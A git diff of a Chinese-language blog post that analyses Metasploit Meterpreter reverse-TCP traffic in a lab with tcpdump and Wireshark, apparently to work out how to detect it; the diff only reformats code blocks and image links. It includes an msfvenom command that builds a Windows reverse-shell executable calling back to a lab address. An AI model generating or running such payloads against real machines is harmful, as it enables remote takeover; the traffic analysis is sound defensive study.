--- a/_posts/2018-01-25-msf-deny.md
+++ b/_posts/2018-01-25-msf-deny.md
@@ -12,7 +12,9 @@ description: "本篇文章主要记录一下自己的网络分析过程，以及
 ## 0x01 生成Metasploit木马
 
 
-```msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=8877 -f exe -o hello.exe```
+```
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=8877 -f exe -o hello.exe
+```
 
 基本可以看到，若目标执行**hello.exe**后会主动连接**10.211.55.2**的**8877**端口
 
@@ -52,16 +54,16 @@ description: "本篇文章主要记录一下自己的网络分析过程，以及
 -vv：更详细显示指令执行过程；
 -x：用十六进制字码列出数据包资料；
 -w<数据包文件>：把数据包数据写入指定的文件。
-
 ```
 
 * 参考：http://man.linuxde.net/tcpdump
+
 
 在**10.211.55.2**上分析**10.211.55.11**的连接数据包：
 
 ```sudo tcpdump -i vnic0 -vv dst 10.211.55.2 and port 8877```
 
-[开启监听][0x01]
+![开启监听][0x01]
 
 msf这边已经开启监听以及抓包分析
 
@@ -146,7 +148,7 @@ tcpdump: listening on vnic0, link-type EN10MB (Ethernet), capture size 262144 by
     windows-7.shared.49324 > 10.211.55.2.8877: Flags [P.], cksum 0x095d (correct), seq 6967:7351, ack 413827, win 256, length 384
 ```
 
-[收到数据][0x02]
+![收到数据][0x02]
 经过被控端执行后，与控制端之间的握手传递数据包如上
 
 
@@ -214,13 +216,12 @@ REQUEST和CONNECTION ACCEPTED，然后进一步用ACK来区分是请求还是应
 
 ```
 sudo tcpdump -i vnic0 -vv dst 10.211.55.2 and port 8877 -w msf.cap
-
 ```
 
 将接受到的数据包保存为文件，直接可以打开Wireshark分析~
 
 
-[Wireshark分析][0x03]
+![Wireshark分析][0x03]
 
 可以看到，的确有几个数据包的PSH为1。
 
@@ -233,6 +234,7 @@ sudo tcpdump -i vnic0 -vv dst 10.211.55.2 and port 8877 -w msf.cap
 * ifconfig
 * sysinfo
 * ...
+
 均带有PSH标志位
 
 
